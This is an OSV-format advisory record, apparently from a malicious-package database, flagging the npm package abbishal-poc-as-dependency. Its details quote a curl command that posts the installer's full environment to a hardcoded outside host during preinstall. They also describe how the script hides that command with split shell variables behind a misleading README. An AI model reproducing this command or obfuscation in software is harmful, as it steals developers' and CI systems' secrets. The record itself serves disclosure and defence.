{"id":"MAL-2026-17653","summary":"Malicious code in abbishal-poc-as-dependency (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bc0e1fb6fb8f481baf7c16b593aa342b3b63165f9e97e395ff49c4bed18dfa53)\npackage.json declares a preinstall lifecycle script `sh./test.sh`. test.sh assembles a `curl -d \"$(env)\" https://abbishal.com/sh/installation-success` command by splitting the tokens `curl`, `env`, and `-d` across single-character shell variables (`i=c`, `s=u`, `a=rl`, `t=en`) and reconstructing them via variable concatenation and command substitution. On `npm install` this POSTs the entire output of `env` — the installer shell/CI's full process environment, including any exported secrets such as CI tokens, cloud credentials (AWS_*, GCP, Azure), and npm publish tokens — to a hardcoded third-party host. The README asserts that the package performs no network requests, no filesystem access, no data collection, and has no preinstall/postinstall lifecycle scripts, directly contradicting the shipped manifest and script. The variable-fragment obfuscation and the cover-story README indicate deliberate evasion rather than a legitimate placeholder or canary.\n","modified":"2026-10-08T04:00:04.889095768Z","published":"2026-10-08T03:36:37Z","database_specific":{"malicious-packages-origins":[{"sha256":"484b402674ecbe568cbba8f2ceea75416fe46fc6ab549ae19594915eccbbfbe8","source":"amazon-inspector","versions":["1.3.1"],"id":"IN-MAL-2026-021106","import_time":"2026-10-08T03:50:28.268520535Z","modified_time":"2026-10-08T03:36:44Z"},{"id":"IN-MAL-2026-021105","import_time":"2026-10-08T03:50:28.211914676Z","modified_time":"2026-10-08T03:36:37Z","sha256":"bc0e1fb6fb8f481baf7c16b593aa342b3b63165f9e97e395ff49c4bed18dfa53","source":"amazon-inspector","versions":["1.3.0"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/abbishal-poc-as-dependency/v/1.3.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/abbishal-poc-as-dependency/v/1.3.0"}],"affected":[{"package":{"name":"abbishal-poc-as-dependency","ecosystem":"npm","purl":"pkg:npm/abbishal-poc-as-dependency"},"versions":["1.3.1","1.3.0"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"8e04f735a8a7f93e3fc64369321aa4d459715828","sha512_sri":"sha512-1ZaGyUWN1fI08yuTnUUNYoOp5zrkfTig8HMyxqrJoDiWC3MoKU9dd/6RJtWzGKw1wGwsoGrwyqnHkaQnIGppjw=="},"filename":"abbishal-poc-as-dependency-1.3.1.tgz"}],"evidence_files":[{"path":"test.sh","sha256":"3d01b172ee5cba35a504d85d771561cc3bcf125a8cf21e2c5b4619c1d4ca521a","tlsh":"acd07ddb0160e1f8efd2096f4b8212607aa4a0843912109c52da025b0201090754fc51"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc-as-dependency/MAL-2026-17653.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}